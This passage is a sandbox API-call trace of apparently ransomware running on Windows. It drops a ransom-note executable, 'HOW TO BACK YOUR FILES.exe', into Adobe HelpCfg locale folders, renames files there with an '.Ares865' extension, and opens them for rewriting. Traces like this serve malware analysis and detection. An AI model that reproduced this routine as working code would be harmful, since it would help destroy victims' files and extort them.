lpString2="aoldtz.exe") returned 1 [0152.185] lstrcpyW (in: lpString1=0x2cce464, lpString2="tr_TR" | out: lpString1="tr_TR") returned="tr_TR" [0152.185] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a48 [0152.185] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2e51d8 [0152.185] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a50 | out: ListHead=0x2e7710, ListEntry=0x2e7a50) returned 0x2e7a30 [0152.185] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53936140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53936140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uk_UA", cAlternateFileName="")) returned 1 [0152.185] lstrcmpiW (lpString1="uk_UA", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0152.185] lstrcmpiW (lpString1="uk_UA", lpString2="aoldtz.exe") returned 1 [0152.185] lstrcpyW (in: lpString1=0x2cce464, lpString2="uk_UA" | out: lpString1="uk_UA") returned="uk_UA" [0152.185] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a68 [0152.185] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2e5250 [0152.185] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a70 | out: ListHead=0x2e7710, ListEntry=0x2e7a70) returned 0x2e7a50 [0152.185] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d580500, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53936140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53936140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh_CN", cAlternateFileName="")) returned 1 [0152.185] lstrcmpiW (lpString1="zh_CN", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0152.185] lstrcmpiW (lpString1="zh_CN", lpString2="aoldtz.exe") returned 1 [0152.185] lstrcpyW (in: lpString1=0x2cce464, lpString2="zh_CN" | out: lpString1="zh_CN") returned="zh_CN" [0152.185] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a88 [0152.185] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2e52c8 [0152.185] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a90 | out: ListHead=0x2e7710, ListEntry=0x2e7a90) returned 0x2e7a70 [0152.185] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d580500, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x5390ffe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5390ffe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh_TW", cAlternateFileName="")) returned 1 [0152.185] lstrcmpiW (lpString1="zh_TW", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0152.186] lstrcmpiW (lpString1="zh_TW", lpString2="aoldtz.exe") returned 1 [0152.186] lstrcpyW (in: lpString1=0x2cce464, lpString2="zh_TW" | out: lpString1="zh_TW") returned="zh_TW" [0152.186] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7cc8 [0152.186] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2e5340 [0152.186] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7cd0 | out: ListHead=0x2e7710, ListEntry=0x2e7cd0) returned 0x2e7a90 [0152.186] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d580500, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x5390ffe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5390ffe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh_TW", cAlternateFileName="")) returned 0 [0152.186] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0152.186] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7cd0 [0152.186] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW" [0152.186] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e5340 | out: hHeap=0x2b0000) returned 1 [0152.186] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7cc8 | out: hHeap=0x2b0000) returned 1 [0152.186] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW") returned 55 [0152.186] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW" [0152.186] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0152.186] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\zh_tw\\how to back your files.exe"), bFailIfExists=1) returned 0 [0152.187] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0152.188] GetLastError () returned 0x0 [0152.188] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0152.188] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0152.188] CloseHandle (hObject=0x120) returned 1 [0152.188] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0152.188] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0152.188] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d580500, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x5390ffe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5390ffe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0152.189] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0152.189] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0152.189] lstrcpyW (in: lpString1=0x2cce470, lpString2="Reader_10.0.helpcfg" | out: lpString1="Reader_10.0.helpcfg") returned="Reader_10.0.helpcfg" [0152.189] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0152.189] lstrlenW (lpString="Ares865") returned 7 [0152.189] lstrcmpiW (lpString1="helpcfg", lpString2="Ares865") returned 1 [0152.190] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW\\Reader_10.0.helpcfg.Ares865") returned 83 [0152.190] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\zh_tw\\reader_10.0.helpcfg"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\zh_tw\\reader_10.0.helpcfg.ares865"), dwFlags=0x1) returned 1 [0152.191] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\zh_tw\\reader_10.0.helpcfg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.191] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=349) returned 1 [0152.191] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.192] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e5340 [0152.192] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.200] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN" [0152.200] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e52c8 | out: hHeap=0x2b0000) returned 1 [0152.200] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a88 | out: hHeap=0x2b0000) returned 1 [0152.200] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN") returned 55 [0152.200] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN" [0152.200] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0152.200] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\zh_cn\\how to back your files.exe"), bFailIfExists=1) returned 0 [0152.201] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0152.201] GetLastError () returned 0x0 [0152.201] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0152.201] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0152.202] CloseHandle (hObject=0x120) returned 1 [0152.202] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0152.202] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0152.202] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d580500, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53936140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53936140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0152.202] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0152.202] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0152.202] lstrcpyW (in: lpString1=0x2cce470, lpString2="Reader_10.0.helpcfg" | out: lpString1="Reader_10.0.helpcfg") returned="Reader_10.0.helpcfg" [0152.202] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0152.202] lstrlenW (lpString="Ares865") returned 7 [0152.202] lstrcmpiW (lpString1="helpcfg", lpString2="Ares865") returned 1 [0152.202] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\Reader_10.0.helpcfg.Ares865") returned 83 [0152.202] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\zh_cn\\reader_10.0.helpcfg"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\zh_cn\\reader_10.0.helpcfg.ares865"), dwFlags=0x1) returned 1 [0152.204] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\zh_cn\\reader_10.0.helpcfg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.204] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=349) returned 1 [0152.204] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.204] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e52c8 [0152.204] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.211] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA" [0152.211] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e5250 | out: hHeap=0x2b0000) returned 1 [0152.211] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a68 | out: hHeap=0x2b0000) returned 1 [0152.211] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA") returned 55 [0152.211] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA" [0152.211] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0152.211] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\uk_ua\\how to back your files.exe"), bFailIfExists=1) returned 0 [0152.212] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0152.213] GetLastError () returned 0x0 [0152.213] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0152.213] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0152.213] CloseHandle (hObject=0x120) returned 1 [0152.213] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0152.213] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0152.213] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53936140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53936140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0152.213] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0152.213] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0152.213] lstrcpyW (in: lpString1=0x2cce470, lpString2="Reader_10.0.helpcfg" | out: lpString1="Reader_10.0.helpcfg") returned="Reader_10.0.helpcfg" [0152.213] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0152.213] lstrlenW (lpString="Ares865") returned 7 [0152.213] lstrcmpiW (lpString1="helpcfg", lpString2="Ares865") returned 1 [0152.214] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\Reader_10.0.helpcfg.Ares865") returned 83 [0152.214] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\uk_ua\\reader_10.0.helpcfg"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\uk_ua\\reader_10.0.helpcfg.ares865"), dwFlags=0x1) returned 1 [0152.215] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\uk_ua\\reader_10.0.helpcfg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.215] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=349) returned 1 [0152.215] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.216] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e5250 [0152.216] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.221] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR" [0152.221] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e51d8 | out: hHeap=0x2b0000) returned 1 [0152.221] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a48 | out: hHeap=0x2b0000) returned 1 [0152.221] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR") returned 55 [0152.221] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR" [0152.221] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0152.221] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\tr_tr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0152.222] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0152.222] GetLastError () returned 0x0 [0152.222] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0152.222] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0152.222] CloseHandle (hObject=0x120) returned 1 [0152.222] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0152.222] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0152.222] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53936140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53936140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0152.222] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0152.223] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0152.223] lstrcpyW (in: lpString1=0x2cce470, lpString2="Reader_10.0.helpcfg" | out: lpString1="Reader_10.0.helpcfg") returned="Reader_10.0.helpcfg" [0152.223] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0152.223] lstrlenW (lpString="Ares865") returned 7 [0152.223] lstrcmpiW (lpString1="helpcfg", lpString2="Ares865") returned 1 [0152.223] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR\\Reader_10.0.helpcfg.Ares865") returned 83 [0152.223] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\tr_tr\\reader_10.0.helpcfg"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\tr_tr\\reader_10.0.helpcfg.ares865"), dwFlags=0x1) returned 1 [0152.225] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\tr_tr\\reader_10.0.helpcfg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.225] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=349) returned 1 [0152.225] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.225] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e51d8 [0152.225] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.228] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE" [0152.228] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e5160 | out: hHeap=0x2b0000) returned 1 [0152.228] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a28 | out: hHeap=0x2b0000) returned 1 [0152.228] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE") returned 55 [0152.228] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE" [0152.228] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0152.229] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), 